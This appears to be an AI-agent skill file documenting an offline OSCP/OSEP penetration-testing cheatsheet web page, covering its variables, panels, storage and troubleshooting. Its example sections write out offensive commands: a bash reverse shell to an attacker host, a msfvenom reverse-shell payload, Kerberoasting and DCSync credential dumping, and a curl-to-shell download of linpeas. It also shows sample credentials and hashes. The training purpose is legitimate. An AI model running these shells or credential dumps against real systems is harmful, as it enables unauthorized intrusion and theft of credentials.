---
name: oscp-pentestcheatsheet-terminal
description: Single-file offline penetration testing cheatsheet terminal with 580+ commands, variable substitution, and engagement tracking for OSCP/OSEP preparation
triggers:
- how do I use the pentest cheatsheet terminal
- show me OSCP command reference tool
- set up pentesting cheatsheet interface
- configure pentest terminal variables
- add custom commands to cheatsheet
- export pentest notes and intel
- use offline OSCP cheatsheet
- customize pentesting command reference
---
# OSCP Pentestcheatsheet Terminal Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection
## Overview
The OSCP+ Pentestcheatsheet is a single-file, offline-ready HTML command reference terminal containing 580+ penetration testing commands organized into 28 sections. It features variable substitution, favorites, notes, target intel tracking, and command history — all running locally in your browser with localStorage persistence.
## Installation
```bash
# Clone the repository
git clone https://github.com/anshu19981/Pentestcheatsheet.git
cd Pentestcheatsheet
# Open directly in browser (no build step required)
open index.html
# or
firefox index.html
# or
google-chrome index.html
```
**No dependencies required** — it's a fully self-contained HTML file that works offline.
## Project Structure
```
Pentestcheatsheet/
├── index.html # Single-file terminal (all functionality)
├── profile.jpg # Optional profile image
└── README.md
```
## Key Features
### 1. Variable Substitution System
The terminal uses placeholder variables that auto-substitute into every command:
| Variable | Default | Purpose |
|----------|---------|---------|
| `{LHOST}` | `10.10.14.1` | Attacker IP |
| `{RHOST}` | `10.10.10.10` | Target IP |
| `{LPORT}` | `4444` | Listener port |
| `{RPORT}` | `9001` | Target port |
| `{DOMAIN}` | `corp.local` | AD domain |
| `{DC}` | `192.168.1.10` | Domain Controller |
| `{USER}` | `john` | Username |
| `{PASS}` | `Password123` | Password |
| `{HASH}` | `NTLM_HASH_HERE` | NTLM hash |
| `{URL}` | `http://10.10.10.10` | Target URL |
### 2. Command Sections
Commands are organized into 4 major groups:
**OSCP+ Core**: Recon, Web Attacks, API Attacks, Shells, Linux/Windows PrivEsc, Cloud, Pivoting, Password Attacks, OSINT, Wireless, Misc
**Active Directory**: AD Recon, AD Attacks, Lateral Movement, Persistence, ADCS, Advanced Attacks
**OSEP Advanced**: Evasion/OPSEC, Injection, C2 Frameworks, VBA/Office, Binary Analysis
**Post-Exploitation**: Loot/Post-Exploit, Hash Cracking, Buffer Overflow, Tunneling, File Transfer
### 3. UI Interactions
**Keyboard Shortcuts**:
- `Ctrl+K` — Focus search
- `Escape` — Clear search
- `Ctrl+D` — Toggle dark/light mode
- `Ctrl+F` — Open favorites panel
**Per-Command Actions**:
- **Copy** — Copies command with variables substituted
- **1-line** — Converts multiline to single line with `;`
- **★ Star** — Adds to favorites
- **📝 Note** — Adds inline note to command
- **✔ Mark Done** — Tracks completed commands
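
A sketch of what the **Copy** and **1-line** actions have to do, added here as an illustration and not taken from the project's `index.html`. The function names are hypothetical, and dropping comment lines before joining is an assumption about sensible behaviour, since a leading `#` would otherwise comment out everything after it on the joined line.

```javascript
// Added illustration; not the project's own code. Function names are hypothetical.
const PLACEHOLDER = /\{([A-Z]+)\}/g;

// Replace every {NAME} with vars[NAME] and report names left unresolved or empty.
// A replacer function is used so values containing "$&" or "$1" are inserted literally.
function renderCommand(template, vars) {
  const missing = new Set();
  const text = template.replace(PLACEHOLDER, (match, name) => {
    const known = Object.prototype.hasOwnProperty.call(vars, name);
    const value = known ? String(vars[name]).trim() : '';
    if (value === '') {
      missing.add(name);
      return match; // keep the placeholder visible rather than emit a broken command
    }
    return value;
  });
  return { text, missing: [...missing] };
}

// Join a multiline command with ';'. Blank and comment-only lines are dropped
// first (assumption): a leading '#' would comment out the rest of the joined line.
function toOneLine(command) {
  return command
    .split('\n')
    .map((line) => line.trim())
    .filter((line) => line !== '' && !line.startsWith('#'))
    .join('; ');
}

// Constructed sample input, built from commands and defaults shown on this page.
const vars = { LHOST: '10.10.14.1', RHOST: '10.10.10.10', LPORT: '4444' };
const template = [
  '# Full nmap scan',
  'nmap -sC -sV -p- --min-rate=1000 -T4 {RHOST} -oA nmap_full',
  '# Netcat listener',
  'nc -nvlp {LPORT}',
].join('\n');

const rendered = renderCommand(template, vars);
console.log(toOneLine(rendered.text));
console.log(renderCommand('ping -c 1 {DC}', vars).missing);
```

A non-empty `missing` list is the condition to surface before copying, which is the case the "Variables Not Substituting" troubleshooting entry describes.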
### 4. Panels
- **🎯 INTEL** — Target intelligence notepad (scope, creds, flags, pivots)
- **📓 NOTES** — Freeform side notes with timestamps
- **⏱ HIST** — Last 20 copied commands
- **★ FAVS** — Starred commands
- **+ ADD** — Add custom commands
## Usage Patterns
### Basic Workflow
```javascript
// 1. Open index.html in browser
// 2. Set variables at top of page
// LHOST: 10.10.14.5
// RHOST: 10.10.10.150
// LPORT: 443
// DOMAIN: htb.local
// 3. Navigate to section (e.g., "Shells")
// 4. Click "Copy" on desired command
// Example: Reverse shell command automatically becomes:
// bash -i >& /dev/tcp/10.10.14.5/443 0>&1
// 5. Paste into terminal and execute
```
### Search Functionality
```javascript
// Press Ctrl+K or click search bar
// Type: "nmap stealth"
// Results filter across all 580+ commands instantly
// Search examples:
// "kerberoasting" → finds all AD kerberoast commands
// "reverse shell" → finds shell commands across sections
// "bloodhound" → finds AD enumeration commands
// "amsi bypass" → finds evasion techniques
```
### Adding Custom Commands
```javascript
// Click "+ ADD" button
// Fill in form:
const customCommand = { // form fields shown as an object; the variable name is illustrative
"title": "Custom Ligolo Tunnel Setup",
"command": `# Start ligolo proxy on {LHOST}
sudo ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# On target, upload and run agent
ligolo-agent -connect {LHOST}:11601 -ignore-cert
# In ligolo prompt:
session
ifconfig
listener_add --addr 0.0.0.0:{LPORT} --to 127.0.0.1:445`,
"tags": ["CRITICAL", "OSEP"]
}
// Command appears in "Custom" section
// Saved to localStorage automatically
```
### Managing Target Intel
```javascript
// Click "🎯 INTEL" panel
// Fill in engagement data:
const targetIntel = { // panel fields shown as an object; the variable name is illustrative
"engagementName": "HackTheBox - Inception",
"targetScope": "10.10.10.67\n10.10.10.68",
"currentObjective": "Privesc via docker escape",
"credentials": [
{ user: "cobb", pass: "Mr.Inception!", type: "SSH" },
{ user: "administrator", hash: "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c", type: "NTLM" }
],
"flags": {
"user": "a5c2ff8b9c2e3d4a1b6789...",
"root": "b8d4ac7f2e9a1c5d8b4673..."
},
"pivotPoints": "10.10.10.67:22 → 172.16.1.10:445",
"notes": "Docker socket exposed at /var/run/docker.sock"
}
// Click "Export" to save as intel_YYYY-MM-DD.txt
```
### Working with Favorites
```javascript
// Star frequently used commands by clicking ★
// Access via "★ FAVS" panel
// Example favorites workflow:
// 1. Star "Python HTTP Server" from File Transfer
// 2. Star "Nmap Full Port Scan" from Recon
// 3. Star "Impacket psexec.py" from AD Lateral
// 4. Open FAVS panel — all 3 accessible instantly
// Export favorites:
// Click "Export" in FAVS panel → saves favorites.txt
```
### Notes System
```javascript
// Click "📓 NOTES" panel
// Add note:
const note = { // note fields shown as an object; the variable name is illustrative
"title": "AD Attack Path",
"content": `1. ASREProast on user svc-alfresco
2. WinRM as svc-alfresco
3. BloodHound shows WriteDACL on Exchange Windows Permissions
4. Add svc-alfresco to group → DCSync
5. secretsdump.py for Administrator NTLM`
}
// Each note:
// - Auto-saves on keystroke
// - Shows timestamp
// - Persists across sessions
// - Counts shown in header badge
```
### Command History
```javascript
// Every copied command tracked automatically
// Access via "⏱ HIST" panel
// Shows last 20 copies with timestamps
// Click any history item to re-copy
// Example history view:
// [14:32] nmap -sC -sV -p- 10.10.10.67
// [14:35] chisel server --reverse --port 8080
// [14:38] impacket-secretsdump 'htb.local/admin:P@ssw0rd@10.10.10.67'
```
## Command Examples by Category
### Reconnaissance
```bash
# Full nmap scan with variable substitution
nmap -sC -sV -p- --min-rate=1000 -T4 {RHOST} -oA nmap_full
# Rustscan
rustscan -a {RHOST} -- -sC -sV
# Web fuzzing
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u {URL}/FUZZ -mc 200,301,302,403
```
### Active Directory
```bash
# Kerberoasting
impacket-GetUserSPNs {DOMAIN}/{USER}:{PASS} -dc-ip {DC} -request
# BloodHound collection
bloodhound-python -u {USER} -p {PASS} -ns {DC} -d {DOMAIN} -c All
# DCSync
impacket-secretsdump '{DOMAIN}/{USER}:{PASS}@{DC}'
```
### Shells & Listeners
```bash
# Netcat listener
nc -nvlp {LPORT}
# Bash reverse shell
bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1
# Msfvenom Windows payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe
```
### Privilege Escalation
```bash
# Linux SUID enumeration
find / -perm -4000 -type f 2>/dev/null
# Windows token impersonation check
whoami /priv
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```
## Data Persistence
All user data stored in browser `localStorage`:
```javascript
// Storage keys:
cs_favorites // Starred commands
cs_commandNotes // Per-command notes
cs_commandsDone // Completion tracking
cs_targetIntel // Intel panel data
cs_sideNotes // Notes panel data
cs_copyHistory // Command history
cs_customCommands // User-added commands
cs_theme // Dark/light preference
cs_variables // LHOST, RHOST, etc.
```
### Clear All Data
```javascript
// Open browser DevTools (F12)
// Go to: Application → Local Storage → file://
// Delete keys starting with "cs_"
// Or via console (removes every key stored for this origin, not only the "cs_" keys):
localStorage.clear()
```
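
A narrower alternative for end-of-engagement cleanup, added here as an example and not part of the project: it snapshots and then removes only the `cs_` keys listed above, leaving other data on the same origin alone. The function names and the `MemoryStorage` stand-in are hypothetical; in the DevTools console, pass `localStorage` instead.

```javascript
// Added illustration; not the project's own code. Function names are hypothetical.
const PREFIX = 'cs_';

// Collect key names first: removing entries while indexing with key(i) shifts
// the remaining indices and skips some of them.
function cheatsheetKeys(storage) {
  const keys = [];
  for (let i = 0; i < storage.length; i += 1) {
    const key = storage.key(i);
    if (key !== null && key.startsWith(PREFIX)) keys.push(key);
  }
  return keys;
}

// Return a JSON snapshot of the cs_* entries, for backup before wiping.
function exportCheatsheetData(storage) {
  const snapshot = {};
  for (const key of cheatsheetKeys(storage)) snapshot[key] = storage.getItem(key);
  return JSON.stringify(snapshot, null, 2);
}

// Remove only the cs_* entries; returns how many were removed.
function clearCheatsheetData(storage) {
  const keys = cheatsheetKeys(storage);
  keys.forEach((key) => storage.removeItem(key));
  return keys.length;
}

// Minimal in-memory stand-in for the Web Storage interface so the example runs
// outside a browser.
class MemoryStorage {
  constructor(entries) { this.map = new Map(Object.entries(entries)); }
  get length() { return this.map.size; }
  key(i) { const k = [...this.map.keys()]; return i < k.length ? k[i] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  removeItem(k) { this.map.delete(k); }
}

// Constructed sample data.
const store = new MemoryStorage({
  cs_theme: 'dark',
  cs_targetIntel: '{"engagementName":"lab"}',
  other_app_setting: 'keep me',
});
console.log(exportCheatsheetData(store));
console.log(clearCheatsheetData(store), store.length);
```

The snapshot contains whatever credentials and hashes were typed into the INTEL panel, so it belongs in the engagement's protected storage, not in a downloads folder.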
## Customization
### Adding New Section (Modify index.html)
```javascript
// Find sections array in <script> tag
sections.push({
id: 'custom-recon',
name: '🔎 Custom Recon',
group: 'OSCP+ Core',
commands: [
{
title: 'Custom Port Scanner',
command: 'masscan -p1-65535 {RHOST} --rate=1000 -e tun0',
tags: ['HIGH']
}
]
});
```
### Changing Default Variables
```javascript
// Locate defaultVariables object in <script>
const defaultVariables = {
LHOST: '192.168.45.199', // Your VPN IP
RHOST: '192.168.45.150', // Lab target
LPORT: '443',
RPORT: '80',
DOMAIN: 'lab.local',
DC: '192.168.45.100',
USER: 'admin',
PASS: 'P@ssw0rd123',
HASH: 'aad3b435b51404eeaad3b435b51404ee:...',
URL: 'http://192.168.45.150'
};
```
## Integration with External Tools
### Export to CherryTree
```javascript
// 1. Open INTEL panel
// 2. Fill in all engagement data
// 3. Click "Export" → saves intel_YYYY-MM-DD.txt
// 4. Import into CherryTree as plain text node
// Or export favorites:
// FAVS panel → Export → favorites.txt
// Import as code block in CherryTree
```
### Use with tmux/Terminal
```bash
# Split tmux pane
tmux split-window -h
# Left pane: Browser with cheatsheet
# Right pane: Terminal for execution
# Workflow:
# 1. Copy command from cheatsheet
# 2. Switch to terminal pane (Ctrl+b →)
# 3. Paste and execute
# 4. Copy output, switch back (Ctrl+b ←)
# 5. Add output to NOTES panel
```
## Troubleshooting
### Variables Not Substituting
```javascript
// Check if variables bar is filled
// Look for red outline on empty required fields
// Manual verification:
// Copy a command, check if {LHOST} is replaced
// If not, reload page: Ctrl+Shift+R (hard refresh)
```
### localStorage Not Persisting
```javascript
// Check browser privacy settings
// Firefox: Preferences → Privacy → History → "Remember history"
// Chrome: Settings → Privacy → Cookies → Allow all
// If using Private/Incognito mode:
// Data will NOT persist between sessions
```
### Export Button Not Working
```javascript
// Check browser console (F12 → Console)
// Common issue: popup blocker
// Solution:
// Allow popups from file:// or localhost
// Or: Right-click Export → Save Link As
```
### Search Not Finding Commands
```javascript
// Search is case-insensitive and searches:
// - Command titles
// - Command content
// - Section names
// If no results:
// 1. Clear search (Escape)
// 2. Try alternate keywords
// "kerberos" instead of "kerberoasting"
// "shell" instead of "reverse shell"
```
### Dark Mode Not Saving
```javascript
// Theme preference stored in localStorage
// Key: cs_theme
// Manual fix:
localStorage.setItem('cs_theme', 'dark') // or 'light'
location.reload()
```
## Best Practices
1. **Set variables first** — Fill LHOST, RHOST before using any commands
2. **Star essentials** — Favorite your go-to commands for quick access
3. **Use INTEL panel** — Track creds and flags as you find them
4. **Export regularly** — Backup intel and notes to text files
5. **Custom commands** — Add your own tools and one-liners
6. **History review** — Check HIST panel to verify what you've run
7. **Offline first** — Download and use locally, not from GitHub Pages
8. **Clean data** — Clear localStorage between engagements for OPSEC
## Security Considerations
- **Air-gapped safe** — Fully offline after initial load
- **No telemetry** — Nothing sent to external servers
- **Local storage only** — All data in browser localStorage
- **Authorized use only** — Tool for legal penetration testing only
- **Clear data** — Remember to clear sensitive intel after engagement
## Additional Resources
- **Project repo**: https://github.com/anshu19981/Pentestcheatsheet
- **Live demo**: https://anshu19981.github.io/Pentestcheatsheet/
- **Author**: [Anshuman Jha LinkedIn](https://www.linkedin.com/in/anshuman-jha-86bbb9202/)
This cheatsheet terminal is designed for OSCP/OSEP exam preparation and professional penetration testing engagements. Use it as your command reference hub during engagements, HTB machines, or certification exams.